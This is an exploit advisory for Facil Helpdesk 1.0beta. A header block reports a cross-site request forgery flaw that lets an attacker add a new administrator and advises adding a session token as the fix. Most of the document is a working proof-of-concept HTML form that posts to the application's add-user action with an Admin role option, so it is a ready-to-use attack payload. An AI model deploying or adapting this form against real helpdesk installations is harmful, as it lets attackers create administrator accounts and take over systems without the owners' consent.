< ------------------- header data start ------------------- >

#############################################################

# Application Name :Facil Helpdesk

# Version : 1.0beta

# vulnerable Type : xsrf

# Infection : Yeni Bir Admin Eklenebilir.

# Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmeli

# author : BUG RESEARCHERS//CWH1RLPOOL

#############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >
<form action=http://www.demo.cromosoft.com/helpdesk/tickets2.php?action=ad_user method=post><span class=mio><table width=700 cellpadding=1 cellspacing=1 align=center>
<input name=name size=30/>
<input name=username id=username size=30>
<input name=password type=password size=30>
<input name=email size=30>
<input name=website type=text id=website size=30>
<input name=company type=text id=company size=30>
<input name=type type=radio value=User checked>
<input type=radio name=type value=Mod>
<input type=radio name=type value=Admin>Admin</label>
<input name=newuser type=hidden id=newuser value=1>
<input type=submit name=userform value=Submit />
</form>
< -- bug code end of -- >